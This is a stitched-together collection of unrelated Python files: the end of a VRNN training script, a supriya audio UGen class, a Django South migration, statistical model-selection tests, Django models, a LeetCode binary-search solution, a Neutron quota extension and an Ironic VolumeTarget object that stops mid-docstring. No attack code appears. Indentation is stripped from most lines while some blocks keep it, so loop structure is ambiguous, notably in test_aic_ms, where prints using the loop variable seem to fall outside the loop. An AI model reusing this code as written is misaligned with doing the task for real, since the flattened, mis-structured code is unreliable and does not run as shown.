kl_term = kl_temp.sum(axis=0).mean()
kl_term.name = 'kl_term'
nll_upper_bound = recon_term + kl_term
nll_upper_bound.name = 'nll_upper_bound'
max_x = x.max()
mean_x = x.mean()
min_x = x.min()
max_x.name = 'max_x'
mean_x.name = 'mean_x'
min_x.name = 'min_x'
max_theta_mu = theta_mu_in.max()
mean_theta_mu = theta_mu_in.mean()
min_theta_mu = theta_mu_in.min()
max_theta_mu.name = 'max_theta_mu'
mean_theta_mu.name = 'mean_theta_mu'
min_theta_mu.name = 'min_theta_mu'
max_theta_sig = theta_sig_in.max()
mean_theta_sig = theta_sig_in.mean()
min_theta_sig = theta_sig_in.min()
max_theta_sig.name = 'max_theta_sig'
mean_theta_sig.name = 'mean_theta_sig'
min_theta_sig.name = 'min_theta_sig'
max_phi_sig = phi_sig_temp.max()
mean_phi_sig = phi_sig_temp.mean()
min_phi_sig = phi_sig_temp.min()
max_phi_sig.name = 'max_phi_sig'
mean_phi_sig.name = 'mean_phi_sig'
min_phi_sig.name = 'min_phi_sig'
max_prior_sig = prior_sig_temp.max()
mean_prior_sig = prior_sig_temp.mean()
min_prior_sig = prior_sig_temp.min()
max_prior_sig.name = 'max_prior_sig'
mean_prior_sig.name = 'mean_prior_sig'
min_prior_sig.name = 'min_prior_sig'
model.inputs = [x, mask]
model.params = params
model.nodes = nodes
optimizer = Adam(
lr=lr
)
extension = [
GradientClipping(batch_size=batch_size),
EpochCount(epoch),
Monitoring(freq=monitoring_freq,
ddout=[nll_upper_bound, recon_term, kl_term,
max_phi_sig, mean_phi_sig, min_phi_sig,
max_prior_sig, mean_prior_sig, min_prior_sig,
max_theta_sig, mean_theta_sig, min_theta_sig,
max_x, mean_x, min_x,
max_theta_mu, mean_theta_mu, min_theta_mu],
data=[Iterator(valid_data, batch_size)]),
Picklize(freq=monitoring_freq, path=save_path),
EarlyStopping(freq=monitoring_freq, path=save_path, channel=channel_name),
WeightNorm()
]
mainloop = Training(
name=pkl_name,
data=Iterator(train_data, batch_size),
model=model,
optimizer=optimizer,
cost=nll_upper_bound,
outputs=[nll_upper_bound],
extension=extension
)
mainloop.run()
if __name__ == "__main__":
import sys, time
if len(sys.argv) > 1:
config_file_name = sys.argv[-1]
else:
config_file_name = 'config.txt'
f = open(config_file_name, 'r')
lines = f.readlines()
params = OrderedDict()
for line in lines:
line = line.split('\n')[0]
param_list = line.split(' ')
param_name = param_list[0]
param_value = param_list[1]
params[param_name] = param_value
main(params)
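# Example config.txt layout implied by the parser above (one space-separated
# "name value" pair per line; the values shown are illustrative only):
#   trial 1
#   data_path ./iamondb
#   save_path ./saved_models
#   monitoring_freq 100
#   epoch 500
#   batch_size 128
#   x_dim 3
#   z_dim 50
#   rnn_dim 1200
#   lr 0.0003
#   debug 0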
|
# -*- encoding: utf-8 -*-
from supriya.tools.ugentools.UGen import UGen
class PeakFollower(UGen):
r'''Tracks peak signal amplitude.
::
>>> source = ugentools.In.ar(0)
>>> peak_follower = ugentools.PeakFollower.ar(
... decay=0.999,
... source=source,
... )
>>> peak_follower
PeakFollower.ar()
'''
### CLASS VARIABLES ###
__documentation_section__ = 'Trigger Utility UGens'
__slots__ = ()
_ordered_input_names = (
'source',
'decay',
)
_valid_calculation_rates = None
### INITIALIZER ###
def __init__(
self,
calculation_rate=None,
decay=0.999,
source=None,
):
UGen.__init__(
self,
calculation_rate=calculation_rate,
decay=decay,
source=source,
)
### PUBLIC METHODS ###
@classmethod
def ar(
cls,
decay=0.999,
source=None,
):
r'''Constructs an audio-rate PeakFollower.
::
>>> source = ugentools.In.ar(0)
>>> peak_follower = ugentools.PeakFollower.ar(
... decay=0.999,
... source=source,
... )
>>> peak_follower
PeakFollower.ar()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.AUDIO
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
decay=decay,
source=source,
)
return ugen
@classmethod
def kr(
cls,
decay=0.999,
source=None,
):
r'''Constructs a control-rate PeakFollower.
::
>>> source = ugentools.In.ar(0)
>>> peak_follower = ugentools.PeakFollower.kr(
... decay=0.999,
... source=source,
... )
>>> peak_follower
PeakFollower.kr()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.CONTROL
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
decay=decay,
source=source,
)
return ugen
### PUBLIC PROPERTIES ###
@property
def decay(self):
r'''Gets `decay` input of PeakFollower.
::
>>> source = ugentools.In.ar(0)
>>> peak_follower = ugentools.PeakFollower.ar(
... decay=0.999,
... source=source,
... )
>>> peak_follower.decay
0.999
Returns ugen input.
'''
index = self._ordered_input_names.index('decay')
return self._inputs[index]
@property
def source(self):
r'''Gets `source` input of PeakFollower.
::
>>> source = ugentools.In.ar(0)
>>> peak_follower = ugentools.PeakFollower.ar(
... decay=0.999,
... source=source,
... )
>>> peak_follower.source
OutputProxy(
source=In(
bus=0.0,
calculation_rate=CalculationRate.AUDIO,
channel_count=1
),
output_index=0
)
Returns ugen input.
'''
index = self._ordered_input_names.index('source')
return self._inputs[index]
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Shop.city'
db.add_column(u'shop_shop', 'city',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, related_name='city_charity', null=True, to=orm['city.City']),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Shop.city'
db.delete_column(u'shop_shop', 'city_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'city.city': {
'Meta': {'object_name': 'City'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '15', 'decimal_places': '10'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '15', 'decimal_places': '10'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'play.player': {
'Meta': {'object_name': 'Player'},
'city': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'city'", 'null': 'True', 'to': u"orm['city.City']"}),
'experience': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '5', 'decimal_places': '0'}),
'facebook_pic': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '4', 'decimal_places': '0'}),
'picture_url': ('django.db.models.fields.CharField', [], {'default': "'/static/img/avatar-1.png'", 'max_length': '400', 'null': 'True'}),
'score': ('django.db.models.fields.DecimalField', [], {'default': '20', 'null': 'True', 'max_digits': '4', 'decimal_places': '0'}),
'token': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'shop.coupon': {
'Meta': {'object_name': 'Coupon'},
'buyers': ('django.db.models.fields.related.ManyToManyField', [], {'default': 'None', 'to': u"orm['play.Player']", 'null': 'True', 'symmetrical': 'False'}),
'coupons_released': ('django.db.models.fields.DecimalField', [], {'default': '10', 'max_digits': '4', 'decimal_places': '0'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '500', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'picture_url': ('django.db.models.fields.CharField', [], {'default': "'/static/img/stanford.png'", 'max_length': '200', 'null': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['shop.Shop']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
u'shop.shop': {
'Meta': {'object_name': 'Shop'},
'city': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'city_charity'", 'null': 'True', 'to': u"orm['city.City']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'picture_url': ('django.db.models.fields.CharField', [], {'default': "'/static/img/stanford.png'", 'max_length': '200', 'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Super shop!'", 'max_length': '100', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
}
}
complete_apps = ['shop']
|
#!/usr/bin/env python3
#title : tests.py
#description : Contains testing methods for the various functions.
#author : Enys Mones
#date : 2015.06.21
#version : 0.1
#usage : python tests.py
#=========================================================================
import numpy as np
from mpmath import exp
from core import utils
from distributions import distribution as dist
from calculation import fit
from calculation import measures as me
from calculation.model_selection import print_pmfs
def test_sampling(distribution):
"""
Tests sampling method for a given distribution.
During the test, this method generates samples from the specific distribution.
Results of the test are written in a file called 'TEST-SAMPLING.CSV', which contains the
theoretical and actual distributions.
:param distribution: distribution to test.
"""
print("TESTING: sampling for %s distribution" % distribution)
params = dist.DISTRIBUTIONS[distribution][dist.KEY_TEST_PARAMS]
print(" input parameters: %s" % dist.get_params(params, distribution))
print(" creating pdf")
test_pmf = dist.pmf(distribution, params)
print(" generating samples")
test_sample_pmf = dist.get_sample_pmf(dist.samples(distribution, params))
test_distribution = []
for i in range(len(test_pmf)):
if i < len(test_sample_pmf):
test_distribution.append([i, test_pmf[i], test_sample_pmf[i]])
else:
test_distribution.append([i, test_pmf[i], 0.0])
test_output = 'TEST-SAMPLE.CSV'
print(" printing results in %s" % test_output)
utils.print_csv(test_output, ['value', 'probability', 'relative_frequency'], test_distribution)
def test_fit_mle(distribution):
"""
Tests MLE fit of a given distribution.
The test generates samples for all distributions and then performs MLE fit of the specified
distribution. Should test robustness of MLE calculations and precision of fit on a sample from
its own distribution.
:param distribution: distribution to test.
"""
print("TESTING: MLE fit for %s distribution" % distribution.upper())
print(" fitting to others")
for sample_dist in dist.get():
print(" %s" % sample_dist.upper())
params = dist.DISTRIBUTIONS[sample_dist][dist.KEY_TEST_PARAMS]
test_sample = dist.samples(sample_dist, params)
fit_result = fit.fit_mle(distribution, test_sample)
print(" input parameters: %s" % dist.get_params(params, sample_dist))
print(" fit parameters: %s" % dist.get_params(fit_result['params'], distribution))
print(" log-likelihood: %r" % fit_result['log-likelihood'])
print(" K-S statistics: %r" % fit_result['D'])
def test_fit_ks(distribution):
"""
Tests K-S fit of a given distribution.
The test generates samples for all distributions and then performs K-S fit of the specified
distribution. Should test robustness of K-S calculations and precision of fit on a sample from
its own distribution.
:param distribution: distribution to test.
"""
print("TESTING: K-S fit for %s distribution" % distribution.upper())
print(" fitting to others")
for sample_dist in dist.get():
print(" %s" % sample_dist.upper())
params = dist.DISTRIBUTIONS[sample_dist][dist.KEY_TEST_PARAMS]
test_sample = dist.samples(sample_dist, params)
fit_results = fit.fit_ks(distribution, test_sample)
print(" input parameters: %s" % dist.get_params(params, sample_dist))
print(" fit parameters: %s" % dist.get_params(fit_results['params'], distribution))
print(" log-likelihood: %r" % fit_results['log-likelihood'])
print(" K-S statistics: %r" % fit_results['D'])
def test_aic_ms(distribution):
"""
Tests AIC model selection.
During the test, this method generates a sample with the specified distribution and then
calculates AIC for all other distributions (including the tested one). Finally, these are
compared and the one with the largest AIC weight is chosen.
:param distribution:
:return:
"""
print("TESTING: AIC model selection for %s distribution" % distribution.upper())
params = dist.DISTRIBUTIONS[distribution][dist.KEY_TEST_PARAMS]
print(" creating sample")
test_sample = dist.samples(distribution, params)
print(" calculating AIC for all distributions")
fit_results = {}
aic = {}
for d in dist.get():
fit_results[d] = fit.fit_mle(d, test_sample)
aic[d] = me.aic_measure(dist.log_likelihood(d, fit_results[d]['params'], test_sample, nonzero_only=True),
len(fit_results[d]['params']))
delta_aic = {d: aic[d]-min(aic.values()) for d in aic}
weights = {d: float(exp(-delta_aic[d]/2)) for d in delta_aic}
best_model = dist.get()[0]
print(" input parameters: %s" % dist.get_params(params, distribution))
    # Normalize by the full weight sum, computed once, so the reported weights
    # do not depend on the iteration order.
    total_weight = sum(weights.values())
    for d in dist.get():
        weights[d] /= total_weight
        if weights[d] > weights[best_model]:
            best_model = d
print(" %s:" % d.upper())
print(" %s" % dist.get_params(fit_results[d]['params'], d))
print(" AIC = %.0f" % aic[d])
print(" dAIC = %.0f" % delta_aic[d])
print(" w = %r" % weights[d])
print(" Most likely model: %s" % best_model.upper())
print_pmfs(test_sample, fit_results, 'TEST-AIC.CSV')
def test_bic_ms(distribution):
"""
Tests BIC model selection.
During the test, this method generates a sample with the specified distribution and then
calculates BIC for all other distributions (including the tested one). Finally, these are
compared and the one with the largest BIC weight is chosen.
:param distribution:
:return:
"""
print("TESTING: BIC model selection for %s distribution" % distribution.upper())
params = dist.DISTRIBUTIONS[distribution][dist.KEY_TEST_PARAMS]
print(" creating sample")
test_sample = dist.samples(distribution, params)
print(" calculating BIC for all distributions")
fit_results = {}
bic = {}
for d in dist.get():
fit_results[d] = fit.fit_mle(d, test_sample)
bic[d] = me.bic_measure(dist.log_likelihood(d, fit_results[d]['params'], test_sample, nonzero_only=True),
len(fit_results[d]['params']), len(test_sample))
delta_bic = {d: bic[d]-min(bic.values()) for d in bic}
weights = {d: float(exp(-delta_bic[d]/2)) for d in delta_bic}
    # Normalise the BIC weights once, against the total of the raw weights, before
    # reporting them; normalising inside the loop would change the total between
    # iterations and bias both the reported weights and the best-model comparison.
    total_weight = sum(weights.values())
    weights = {d: w / total_weight for d, w in weights.items()}
    best_model = max(dist.get(), key=lambda d: weights[d])
    print(" input parameters: %s" % dist.get_params(params, distribution))
    for d in dist.get():
        print(" %s:" % d.upper())
        print(" %s" % dist.get_params(fit_results[d]['params'], d))
        print(" BIC = %.0f" % bic[d])
        print(" dBIC = %.0f" % delta_bic[d])
        print(" w = %r" % weights[d])
print(" Most likely model: %s" % best_model.upper())
print_pmfs(test_sample, fit_results, 'TEST-BIC.CSV')
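# A minimal sketch of the standard BIC formula that me.bic_measure is assumed to
# implement (an assumption, not taken from this module):
# BIC = k * ln(n) - 2 * ln(L), with k free parameters, n samples and maximised
# log-likelihood ln(L).
def _bic_sketch(log_likelihood, n_params, n_samples):
    from math import log
    return n_params * log(n_samples) - 2.0 * log_likelihood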
def test_ks_ms(distribution):
"""
Tests K-S model selection.
During the test, this method generates a sample with the specified distribution and then
    calculates the K-S statistic for every available distribution (including the tested one). Finally,
    these are compared and the model with the lowest K-S statistic (D) is chosen.
    :param distribution: distribution used to generate the test sample.
    """
print("TESTING: K-S model selection for %s distribution" % distribution.upper())
params = dist.DISTRIBUTIONS[distribution][dist.KEY_TEST_PARAMS]
print(" creating sample")
test_sample = dist.samples(distribution, params)
print(" calculating K-S statistics for all distributions")
print(" input parameters: %s" % dist.get_params(params, distribution))
fit_results = {}
best_ksd = 1.0
best_model = dist.get()[0]
for d in dist.get():
print(" %s:" % d.upper())
fit_results[d] = fit.fit_ks(d, test_sample)
if fit_results[d]['D'] < best_ksd:
best_ksd = fit_results[d]['D']
best_model = d
print(" %s" % dist.get_params(fit_results[d]['params'], d))
print(" D = %r" % fit_results[d]['D'])
params = fit_results[d]['params']
        # Bootstrap p-value: draw synthetic samples from the fitted model and count
        # how often their K-S distance exceeds the observed one.
        n_replicates = 100
        p = 0
        for _ in range(n_replicates):
            synthetic_sample = dist.samples(d, params, len(test_sample))
            ksd = me.ks_statistics(dist.get_sample_cdf(synthetic_sample), dist.cdf(d, params, np.max(synthetic_sample)))
            if ksd > fit_results[d]['D']:
                p += 1
        print(" p = %r" % (float(p) / n_replicates))
print(" Best fitting model: %s" % best_model.upper())
print_pmfs(test_sample, fit_results, 'TEST-KS.CSV')
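# A generic sketch of the bootstrap p-value used above (the helper name and the
# callable argument are illustrative): draw synthetic K-S distances from the fitted
# model and report the fraction that exceeds the observed distance.
def _bootstrap_p_value_sketch(observed_d, draw_statistic, n_replicates=100):
    exceed = sum(1 for _ in range(n_replicates) if draw_statistic() > observed_d)
    return float(exceed) / n_replicates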
|
from django.db import models
class ModelRun(models.Model):
    # The user that created the run record
    user = models.CharField(max_length=50)
    # The time the record was created
    created = models.DateTimeField(auto_now_add=True)
    # Edited content (free text)
    edited = models.TextField()
class RunScript(models.Model):
    class Meta:
        get_latest_by = 'version'
    # The user that created the script record
    user = models.CharField(max_length=50)
    # The time the record was created
    created = models.DateTimeField(auto_now_add=True)
    # Edited content (free text)
    edited = models.TextField()
    # The script name
    name = models.CharField(max_length=100)
    # The version number
    version = models.IntegerField()
    # The run identifier (free text, up to 100 characters)
    run = models.CharField(max_length=100)
class DiagnosticConfig(models.Model):
class Meta:
get_latest_by = 'version'
# The user that created the diagnostic configuration
user = models.CharField(max_length=50)
# The time the config was created
created = models.DateTimeField(auto_now_add=True)
# The version number
version = models.IntegerField(default=1)
# The set of diagnostic sets, comma delimited
diag_set = models.CharField(max_length=100, default='')
# The path to the obs data
obs_path = models.CharField(max_length=200, default='')
# The path to the model data
model_path = models.CharField(max_length=200, default='')
# The output data path
output_path = models.CharField(max_length=200, default='')
# The run config name
name = models.CharField(max_length=100, default='default')
# The set of authorized users
allowed_users = models.TextField()
# Diagnostic package
package = models.CharField(max_length=50, default='AMWG')
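# A minimal usage sketch (assumes a configured Django project; the helper name is
# illustrative, not part of the original models): Meta.get_latest_by = 'version'
# lets .latest() return the row with the highest version number.
def latest_diagnostic_config():
    # Returns the DiagnosticConfig with the greatest `version` value.
    return DiagnosticConfig.objects.latest()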
|
import bisect
class Solution:
def searchInsert_brute_forces(self, nums, target) -> int:
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
        for idx, n in enumerate(nums):
            if n >= target:
                return idx
return len(nums)
def searchInsert_std_lib(self, nums, target) -> int:
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
return bisect.bisect_left(nums, target)
def searchInsert(self, nums, target) -> int:
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
l = 0
r = len(nums) - 1
while l <= r:
mid = (l + r) // 2
if nums[mid] == target:
return mid
elif nums[mid] > target:
r = mid - 1
else:
l = mid + 1
return l
if __name__ == '__main__':
assert 2 == Solution().searchInsert([1, 3, 5, 6], 5)
assert 1 == Solution().searchInsert([1, 3, 5, 6], 2)
assert 4 == Solution().searchInsert([1, 3, 5, 6], 7)
assert 0 == Solution().searchInsert([1, 3, 5, 6], 0)
assert 0 == Solution().searchInsert([1], 1)
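    # The alternative implementations are not exercised above; as a small sketch,
    # check that they agree with the binary-search version on the same cases.
    sol = Solution()
    for nums, target in [([1, 3, 5, 6], 5), ([1, 3, 5, 6], 2), ([1, 3, 5, 6], 7),
                         ([1, 3, 5, 6], 0), ([1], 1)]:
        assert sol.searchInsert_brute_forces(nums, target) == sol.searchInsert(nums, target)
        assert sol.searchInsert_std_lib(nums, target) == sol.searchInsert(nums, target)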
|
# Copyright 2017 Intel Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api import extensions as api_extensions
from neutron_lib.api import faults
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import directory
from oslo_config import cfg
from neutron._i18n import _
from neutron.api import extensions
from neutron.api.v2 import resource
from neutron.extensions import quotasv2
from neutron.quota import resource_registry
DETAIL_QUOTAS_ACTION = 'details'
RESOURCE_NAME = 'quota'
ALIAS = RESOURCE_NAME + '_' + DETAIL_QUOTAS_ACTION
QUOTA_DRIVER = cfg.CONF.QUOTAS.quota_driver
RESOURCE_COLLECTION = RESOURCE_NAME + "s"
DB_QUOTA_DRIVER = 'neutron.db.quota.driver.DbQuotaDriver'
EXTENDED_ATTRIBUTES_2_0 = {
RESOURCE_COLLECTION: {}
}
class DetailQuotaSetsController(quotasv2.QuotaSetsController):
def _get_detailed_quotas(self, request, tenant_id):
return self._driver.get_detailed_tenant_quotas(
request.context,
resource_registry.get_all_resources(), tenant_id)
def details(self, request, id):
if id != request.context.project_id:
# Check if admin
if not request.context.is_admin:
reason = _("Only admin is authorized to access quotas for"
" another tenant")
raise n_exc.AdminRequired(reason=reason)
return {self._resource_name:
self._get_detailed_quotas(request, id)}
class Quotasv2_detail(api_extensions.ExtensionDescriptor):
"""Quota details management support."""
# Ensure new extension is not loaded with old conf driver.
extensions.register_custom_supported_check(
ALIAS, lambda: True if QUOTA_DRIVER == DB_QUOTA_DRIVER else False,
plugin_agnostic=True)
@classmethod
def get_name(cls):
return "Quota details management support"
@classmethod
def get_alias(cls):
return ALIAS
@classmethod
def get_description(cls):
return 'Expose functions for quotas usage statistics per project'
@classmethod
def get_updated(cls):
return "2017-02-10T10:00:00-00:00"
@classmethod
def get_resources(cls):
"""Returns Extension Resources."""
controller = resource.Resource(
DetailQuotaSetsController(directory.get_plugin()),
faults=faults.FAULT_MAP)
return [extensions.ResourceExtension(
RESOURCE_COLLECTION,
controller,
member_actions={'details': 'GET'},
collection_actions={'tenant': 'GET'})]
def get_extended_resources(self, version):
return EXTENDED_ATTRIBUTES_2_0 if version == "2.0" else {}
def get_required_extensions(self):
return ["quotas"]
|
# Copyright (c) 2016 Hitachi, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import strutils
from oslo_utils import uuidutils
from oslo_versionedobjects import base as object_base
from ironic.common import exception
from ironic.db import api as db_api
from ironic.objects import base
from ironic.objects import fields as object_fields
from ironic.objects import notification
@base.IronicObjectRegistry.register
class VolumeTarget(base.IronicObject,
object_base.VersionedObjectDictCompat):
# Version 1.0: Initial version
VERSION = '1.0'
dbapi = db_api.get_instance()
fields = {
'id': object_fields.IntegerField(),
'uuid': object_fields.UUIDField(nullable=True),
'node_id': object_fields.IntegerField(nullable=True),
'volume_type': object_fields.StringField(nullable=True),
'properties': object_fields.FlexibleDictField(nullable=True),
'boot_index': object_fields.IntegerField(nullable=True),
'volume_id': object_fields.StringField(nullable=True),
'extra': object_fields.FlexibleDictField(nullable=True),
}
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def get(cls, context, ident):
"""Find a volume target based on its ID or UUID.
:param context: security context
:param ident: the database primary key ID *or* the UUID of a volume
target
:returns: a :class:`VolumeTarget` object
:raises: InvalidIdentity if ident is neither an integer ID nor a UUID
:raises: VolumeTargetNotFound if no volume target with this ident
exists
"""
if strutils.is_int_like(ident):
return cls.get_by_id(context, ident)
elif uuidutils.is_uuid_like(ident):
return cls.get_by_uuid(context, ident)
else:
raise exception.InvalidIdentity(identity=ident)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def get_by_id(cls, context, db_id):
"""Find a volume target based on its database ID.
:param cls: the :class:`VolumeTarget`
:param context: security context
:param db_id: the database primary key (integer) ID of a volume target
:returns: a :class:`VolumeTarget` object
:raises: VolumeTargetNotFound if no volume target with this ID exists
"""
db_target = cls.dbapi.get_volume_target_by_id(db_id)
target = cls._from_db_object(context, cls(), db_target)
return target
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def get_by_uuid(cls, context, uuid):
"""Find a volume target based on its UUID.
:param cls: the :class:`VolumeTarget`
:param context: security context
:param uuid: the UUID of a volume target
:returns: a :class:`VolumeTarget` object
:raises: VolumeTargetNotFound if no volume target with this UUID exists
"""
db_target = cls.dbapi.get_volume_target_by_uuid(uuid)
target = cls._from_db_object(context, cls(), db_target)
return target
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def list(cls, context, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""Return a list of VolumeTarget objects.
:param context: security context
:param limit: maximum number of resources to return in a single result
:param marker: pagination marker for large data sets
:param sort_key: column to sort results by
:param sort_dir: direction to sort. "asc" or "desc".
:returns: a list of :class:`VolumeTarget` objects
:raises: InvalidParameterValue if sort_key does not exist
"""
db_targets = cls.dbapi.get_volume_target_list(limit=limit,
marker=marker,
sort_key=sort_key,
sort_dir=sort_dir)
return cls._from_db_object_list(context, db_targets)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def list_by_node_id(cls, context, node_id, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""Return a list of VolumeTarget objects related to a given node ID.
:param context: security context
:param node_id: the integer ID of the node
:param limit: maximum number of resources to return in a single result
:param marker: pagination marker for large data sets
:param sort_key: column to sort results by
:param sort_dir: direction to sort. "asc" or "desc".
:returns: a list of :class:`VolumeTarget` objects
:raises: InvalidParameterValue if sort_key does not exist
"""
db_targets = cls.dbapi.get_volume_targets_by_node_id(
node_id,
limit=limit,
marker=marker,
sort_key=sort_key,
sort_dir=sort_dir)
return cls._from_db_object_list(context, db_targets)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def list_by_volume_id(cls, context, volume_id, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""Return a list of VolumeTarget objects related to a given volume ID.
:param context: security context
:param volume_id: the UUID of the volume
:param limit: maximum number of volume targets to return in a
single result
:param marker: pagination marker for large data sets
:param sort_key: column to sort results by
:param sort_dir: direction to sort. "asc" or "desc".
:returns: a list of :class:`VolumeTarget` objects
:raises: InvalidParameterValue if sort_key does not exist
"""
db_targets = cls.dbapi.get_volume_targets_by_volume_id(
volume_id,
limit=limit,
marker=marker,
sort_key=sort_key,
sort_dir=sort_dir)
return cls._from_db_object_list(context, db_targets)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def create(self, context=None):
"""Create a VolumeTarget record in the DB.
:param context: security context. NOTE: This should only
be used internally by the indirection_api.
Unfortunately, RPC requires context as the first
argument, even though we don't use it.
A context should be set when instantiating the
object, e.g.: VolumeTarget(context).
:raises: VolumeTargetBootIndexAlreadyExists if a volume target already
